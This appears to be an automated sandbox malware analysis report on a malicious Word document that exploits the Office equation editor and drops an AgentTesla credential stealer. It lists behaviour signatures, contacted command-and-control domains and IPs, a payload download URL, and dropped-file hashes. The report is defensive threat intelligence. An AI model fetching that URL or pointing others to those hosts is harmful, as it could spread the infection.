              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Process Discovery 2 | Distributed Component Object Model | Data from Local System 2 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Application Window Discovery 1 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 132 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 114 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Numbers following a technique name are the count badges attached to that technique in the original matrix.

              Behavior Graph

              Behavior Graph ID: 345163 | Sample: Pending Orders Statement -4... | Startdate: 27/01/2021 | Architecture: WINDOWS | Score: 100

              Sample-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected AgentTesla; 6 other signatures

              Process tree with contacted hosts, dropped files and triggered signatures per process (recovered from the graph):

              • EQNEDT32.EXE (started)
                • DNS/IP: cybersng.duckdns.org 172.111.202.41, ports 49167, 80 (BLACKNIGHT-ASIE, United States); cy.kl-re.com
                • Dropped: C:\Users\user\...\poiuytrewsdfghjklmnbvcx.exe (PE32); C:\Users\user\AppData\Local\...\boobov[1].exe (PE32)
                • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                • poiuytrewsdfghjklmnbvcx.exe (started)
                  • DNS/IP: 193.239.147.103, ports 49168, 80 (DEDIPATH-LLCUS, Brunei Darussalam)
                  • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
                  • poiuytrewsdfghjklmnbvcx.exe (started)
                    • DNS/IP: mail.privateemail.com 198.54.122.60, ports 49169, 49170, 49172 (NAMECHEAP-NETUS, United States)
                    • Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                  • poiuytrewsdfghjklmnbvcx.exe (started)
              • WINWORD.EXE (started)

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              Pending Orders Statement -40064778.doc | 42% | Virustotal |
              Pending Orders Statement -40064778.doc | 48% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

              Domains

              Source | Detection | Scanner | Label
              cybersng.duckdns.org | 0% | Virustotal |
              cy.kl-re.com | 4% | Virustotal |

              URLs

              Source | Detection | Scanner | Label
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
              http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
              http://DynDns.comDynDNS | 0% | URL Reputation | safe
              http://crl.oces.certifikat.dk/oces.crl0 | 0% | URL Reputation | safe
              http://fedir.comsign.co.il/crl/ComSignCA.crl0 | 0% | URL Reputation | safe
              https://sectigo.com/CPS0 | 0% | URL Reputation | safe
              http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe
              http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
              http://ocsp.entrust.net03 | 0% | URL Reputation | safe
              http://ca.sia.it/seccli/repository/CRL.der0J | 0% | URL Reputation | safe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation | safe
              http://cps.chambersign.org/cps/chambersroot.html0 | 0% | URL Reputation | safe
              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr | 0% | Avira URL Cloud | safe
              http://www.chambersign.org1 | 0% | URL Reputation | safe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
              http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
              https://ca.sia.it/seccli/repository/CPS/ | 0% | Avira URL Cloud | safe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | 0% | URL Reputation | safe
              http://crl.chambersign.org/publicnotaryroot.crl0 | 0% | URL Reputation | safe
              http://cy.kl-re.com//power/bo/boobov.exe | 0% | Avira URL Cloud | safe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
              http://www.sk.ee/juur/crl/0 | 0% | URL Reputation | safe
              http://crl.xrampsecurity.com/XGCA.crl0 | 0% | URL Reputation | safe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0 | 0% | URL Reputation | safe
              http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html | 0% | Avira URL Cloud | safe
              http://duylfM.com | 0% | Avira URL Cloud | safe
              http://www.sk.ee/cps/0 | 0% | URL Reputation | safe
              http://www.valicert.com/1 | 0% | URL Reputation | safe
              http://www.%s.comPA | 0% | URL Reputation | safe
              https://xWUrFiDn0aBmFXBFM.net | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cybersng.duckdns.org | 172.111.202.41 | true | true | | unknown
              mail.privateemail.com | 198.54.122.60 | true | false | | high
              cy.kl-re.com | unknown | unknown | false | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://cy.kl-re.com//power/bo/boobov.exe | true | Avira URL Cloud: safe | unknown
                http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html | false | Avira URL Cloud: safe | unknown
                https://xWUrFiDn0aBmFXBFM.net | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://127.0.0.1:HTTP/1.1 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://DynDns.comDynDNS | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.oces.certifikat.dk/oces.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://fedir.comsign.co.il/crl/ComSignCA.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                https://sectigo.com/CPS0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.chambersign.org/chambersroot.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.entrust.net/server1.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | | high
                http://ocsp.sectigo.com0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://ocsp.entrust.net03 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://ca.sia.it/seccli/repository/CRL.der0J | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.certicamara.com/dpc/0Z | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | false | | high
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://cps.chambersign.org/cps/chambersroot.html0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.chambersign.org1 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.diginotar.nl/cps/pkioverheid0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                https://ca.sia.it/seccli/repository/CPS/ | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://mail.privateemail.com | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | false | | high
                http://crl.chambersign.org/publicnotaryroot.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp | false | | high
                http://www.sk.ee/juur/crl/0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://crl.xrampsecurity.com/XGCA.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.e-certchile.cl/html/productos/download/CPSv1 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | false | | high
                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://duylfM.com | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.sk.ee/cps/0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.valicert.com/1 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.%s.comPA | poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
                http://193.239.147.103 | poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://ocsp.entrust.net0D | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.wellsfargo.com/certpolicy0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp | false | | high
                https://secure.comodo.com/CPS0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false | | high
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | poiuytrewsdfghjklmnbvcx.exe | false | URL Reputation: safe | unknown
                http://servername/isapibackend.dll | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://crl.entrust.net/2048ca.crl0 | poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | false |
                                  high
                                  http://www.comsign.co.il/cps0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://cps.chambersign.org/cps/publicnotaryroot.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown

                                  Contacted IPs


                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
193.239.147.103 | unknown | Brunei Darussalam | 35913 | DEDIPATH-LLCUS | false
172.111.202.41 | unknown | United States | 39122 | BLACKNIGHT-ASIE | true
198.54.122.60 | unknown | United States | 22612 | NAMECHEAP-NETUS | false

                                  General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 345163
Start date: 27.01.2021
Start time: 19:28:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 22s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Pending Orders Statement -40064778.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.2% (good quality ratio 5.3%)
• Quality average: 49.5%
• Quality standard deviation: 44.1%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42
• Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

Time | Type | Description
19:29:38 | API Interceptor | 40x Sleep call for process: EQNEDT32.EXE modified
19:29:40 | API Interceptor | 898x Sleep call for process: poiuytrewsdfghjklmnbvcx.exe modified

                                  Joe Sandbox View / Context

                                  IPs


                                                                            Domains


                                                                            ASN


                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.078657124509345
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKbzmbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:TT3kPlE99SNxAhUeo+aKt
                                                                            MD5:A520165884A1CB8BD99E95808D9CA131
                                                                            SHA1:0A36C41C3E673BF089B4C5CF1502119F7FBF9838
                                                                            SHA-256:7FCA5A7CDA786E74804A9575B9CCF004E858B5F91652B434C9C2D7FF36FA42EE
                                                                            SHA-512:5AD9B8368A31CEBF69B82D77B9E319E26F6D153F9B43B35C655F7CD318BCF579ACF5BA911C806C21BE934DB958B0396CA7E6160D76A4274A3AD6952958486E71
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:downloaded
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            IE Cache URL:http://cy.kl-re.com//power/bo/boobov.exe
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2658F6C0-C679-4D43-96D3-E7E6CC77C67B}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):1.1344146986492145
                                                                            Encrypted:false
                                                                            SSDEEP:6:wIgJ6FtSFxq6FtSFaHwNgREqAWlgFJA/jlll8vlw2FrA:XJwdwaQk5uFJAbuvq2ZA
                                                                            MD5:5D451C185B7D589A04AA6712177E0694
                                                                            SHA1:06592E243DD2C109AD226C5F703B6B33AA0ACCFE
                                                                            SHA-256:7D34E941188ACA030691224627FCE62CACE5C65FEC3DE81B0CE73AA74375E6CF
                                                                            SHA-512:CCAD871C8B2740851AE96A13AC8E5F7A02A91B5453EFC053C199FB72E4F514F16D0ED8D0E61BE86DC5942249BDACFF10FB564A8F2AE80B252F744099073AA4E1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):0.05390218305374581
                                                                            Encrypted:false
                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            C:\Users\user\AppData\Local\Temp\Cab232D.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            C:\Users\user\AppData\Local\Temp\Tar232E.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):152788
                                                                            Entropy (8bit):6.316654432555028
                                                                            Encrypted:false
                                                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Pending Orders Statement -40064778.LNK
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:29:36 2021, length=354788, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2268
                                                                            Entropy (8bit):4.5918339824333545
                                                                            Encrypted:false
                                                                            SSDEEP:24:8rD/XTd6jFyi2ekAsqDDv3qPdM7dD2rD/XTd6jFyi2ekAsqDDv3qPdM7dV:8f/XT0jFt26qPQh2f/XT0jFt26qPQ/
                                                                            MD5:016FB75FF443766A7279CA9045AF5BDD
                                                                            SHA1:FD32D47D894E3105C74A04367F2D5EE8A91A87AC
                                                                            SHA-256:1B919601559C7502D75FC4364275964239103DBFCBA815CAA84974E8ACAF9053
                                                                            SHA-512:941629FE30E9CD0EA5B302BA6C6BF3281E1BF0D7C90638F97BA5378F34DDD57A6B49AE40093D62C6A6F6CD97347E2F55E7AFC0B25F0A1E38FEA3CB69B7E565D4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):140
                                                                            Entropy (8bit):4.736685473680344
                                                                            Encrypted:false
                                                                            SSDEEP:3:M1K++i2RyDhdpStb+i2RyDhdpSmX1K++i2RyDhdpSv:MIdi2RULpECi2RULpAdi2RULpc
                                                                            MD5:821573196FFE2311197C79E1D2FD939E
                                                                            SHA1:39CCA7E16FE3E84413C236FCDE8349E681A4CD4C
                                                                            SHA-256:EC23706907FB744BCA81DA26E10E724D5E06A4B6009F0C431110F8045EC44FB5
                                                                            SHA-512:A0BD9FC15A76FCE0AD4FA6C53661B432F8F90A200F80276A64803FD83E02582B22EC5744210B036F0E9018B24411DCFE6FD5CA02877463E3E5497F44CBBE163C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: [doc]..Pending Orders Statement -40064778.LNK=0..Pending Orders Statement -40064778.LNK=0..[doc]..Pending Orders Statement -40064778.LNK=0..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
